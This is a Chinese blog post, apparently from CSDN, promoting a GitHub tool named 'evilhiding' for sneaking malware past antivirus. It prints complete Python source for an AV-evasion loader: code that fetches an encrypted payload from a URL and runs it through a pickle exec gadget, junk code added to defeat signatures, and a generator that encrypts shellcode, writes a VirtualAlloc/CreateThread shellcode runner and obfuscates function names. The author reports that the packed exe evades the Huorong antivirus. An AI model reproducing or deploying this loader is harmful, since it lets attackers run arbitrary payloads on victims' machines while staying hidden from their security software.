-
记一次有趣的免杀探索
前记
evilhiding昨天被提issue不能绕过火绒了,于是今天更新了evilhiding v1.1,已经可以继续免杀了。
期待各位的stars,项目地址如下:
https://github.com/coleak2021/evilhiding- 1
查杀排查
直接python运行b.py发现未被查杀,且可正常上线,但是通过pyinstaller打包为exe后发现被火绒查杀,因此打算对源代码进行修改来绕过火绒
于是对b.py关键部分分别打包检查,发现均未被查杀
加载器
import pickle,base64,requests,ctypes from cryptography.fernet import Fernet url='' def O7867890(sectr): KEY=b'Lo8QurfIObo62aKQsQjnzAocsnrrIkTsJewRJLLKAsA=' fernet = Fernet(KEY) destr = fernet.decrypt(sectr).decode() class A(object): def __reduce__(self): return (exec, (destr,)) ret = pickle.dumps(A()) ret_base64 = base64.b64encode(ret) ret_decode = base64.b64decode(ret_base64) pickle.loads(ret_decode)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
执行器
def O1674418(): try: r=requests.get(url) a = r.status_code except: a = 404 pass if a == 200: O7867890(r.text) else: pass if __name__ == '__main__': exec(t1) exec(t2) O1674418()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
花指令
t2 =""" import base64 st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode() res= base64.b64encode(st) aaa= res.decode() res= base64.b64decode(res) bbb= res.decode() """ t1 =""" import random def O4402217(test_arr, low, high): i = (low - 1) pivot = test_arr[high] for j in range(low, high): if test_arr[j] <= pivot: i = i + 1 test_arr[i], test_arr[j] = test_arr[j], test_arr[i] test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1] return i + 1 def O7313740(test_arr, low, high): if low < high: pi = O4402217(test_arr, low, high) O7313740(test_arr, low, pi - 1) O7313740(test_arr, pi + 1, high) test_arr= [] for i in range(59999): test_arr.append(random.random()) n= len(test_arr) O7313740(test_arr,0, n - 1) """- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
得出结论:各部分可以分别正常打包,但是火绒对整体进行了特征提取,因此我们只需要将文件结构做修改即可
源码修改
经过测试,最终对b.py修改为如下,此时打包为exe可绕过火绒正常上线
from cryptography.fernet import Fernet import pickle,base64,requests,ctypes import random url='' def O7867890(sectr): KEY=b'' fernet = Fernet(KEY) destr = fernet.decrypt(sectr).decode() class A(object): def __reduce__(self): return (exec, (destr,)) def say_hello(self): exec(bbb) a=A() a.say_hello() ret = pickle.dumps(a) ret_base64 = base64.b64encode(ret) ret_decode = base64.b64decode(ret_base64) pickle.loads(ret_decode) bbb =""" import base64 st= 'cccccccccccccccccccooooooooooollllllllllllleeeeeeeeeeeeaaaaaaaaaaaakkkkkkkkk'.encode() res= base64.b64encode(st) aaa= res.decode() res= base64.b64decode(res) bbb= res.decode() """ def O1674418(): try: r=requests.get(url) a = r.status_code except: a = 404 pass if a == 200: O7867890(r.text) else: pass if __name__ == '__main__': O1674418()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
因此,对main.py生成器修改如下
# -*- coding: utf-8 -*- import base64 import re,os,time from cryptography.fernet import Fernet shellcode = b"" url='' key = Fernet.generate_key() fernet = Fernet(key) enstr = fernet.encrypt(shellcode) key2 = Fernet.generate_key() fernet2 = Fernet(key2) a=f''' import ctypes from cryptography.fernet import Fernet KEY={key} fernet=Fernet(KEY) shellcode=fernet.decrypt({enstr}) shellcode = bytearray(shellcode) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) ) handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) ''' cccc=f''' from cryptography.fernet import Fernet import pickle,base64,requests,ctypes import random url=f'{url}' a=[] class B(): def cc(self): for i in range(5): a.append(i) def O7303771(sectr): global destr KEY={key2} fernet = Fernet(KEY) destr = fernet.decrypt(sectr).decode() aaa(destr) def aaa(destr): class A(object): def __reduce__(self): return (exec, (destr,)) def O6294286(self): exec(bbb) a=A() a.O6294286() ret = pickle.dumps(a) ret_base64 = base64.b64encode(ret) ret_decode = base64.b64decode(ret_base64) pickle.loads(ret_decode) bbb =""" for i in range(100): aaa=B() aaa.cc() """ def O0135984(): try: r=requests.get(url) a = r.status_code except: a = 404 pass if a == 200: O7303771(r.text) else: pass if __name__ == '__main__': O0135984() ''' def hunxiao(): openfile = 'content.txt' text = open(openfile, encoding='utf-8').read() wd_df = re.findall("def (.*?)\\(", text) wd_df = list(set(wd_df)) for i in wd_df: if i[0:2] == "__": wd_df.remove(i) if i == 'super': wd_df.remove(i) idlist = [] for i in wd_df: idlist.append('O' + str(hash(i))[-7:]) cs = len(wd_df) if cs == len(set(idlist)): while cs > 0: cs -= 1 text = text.replace(wd_df[cs] + '(', idlist[cs] + '(') text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs]) text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs]) text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs]) else: print('hash repeat') file_save = open('b.py', 'w', encoding='utf-8') file_save.write(text) file_save.close() with open('content.txt', 'bw') as f: f.write(cccc.encode()) hunxiao() with open('a.txt', 'bw') as f: f.write(fernet2.encrypt(a.encode())) with open('content.txt', 'br') as f: content=base64.b64encode(f.read()) b = f''' from cryptography.fernet import Fernet import pickle,base64,requests,ctypes import random cccc={content} exec(base64.b64decode(cccc).decode()) ''' with open('b.py', 'w', encoding='utf-8') as f: f.write(b) iconame=f'{int (time.time() *1000)}.ico' with open('coleak.ico',"br") as f: cont=f.read() with open(f'{iconame}',"bw") as f: cont+=iconame.encode() f.write(cont) with open('create.py',"br") as f: createit=f.read() exec(createit)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
免杀效果测试
-
相关阅读:
荧光染料AF488 antibody labeling kit,AF488抗体标记试剂盒
【SpringBoot】打包成Docker镜像后日志输出中文乱码
OpenShift 4 - 安装 ODF 并部署红帽 Quay (3 Worker)
数据结构-Prim算法构造无向图的最小生成树
题目 1056: 二级C语言-温度转换
python接口自动化测试(八)-unittest-生成测试报告
2022-11-27 ARM- 用C语言实现stm32的三盏灯的点亮
Cocos 进度条物体跟随效果
计算机毕业设计(附源码)python疫情社区管理系统
小程序-网络数据请求
- 原文地址:https://blog.csdn.net/qq_63701832/article/details/134186769
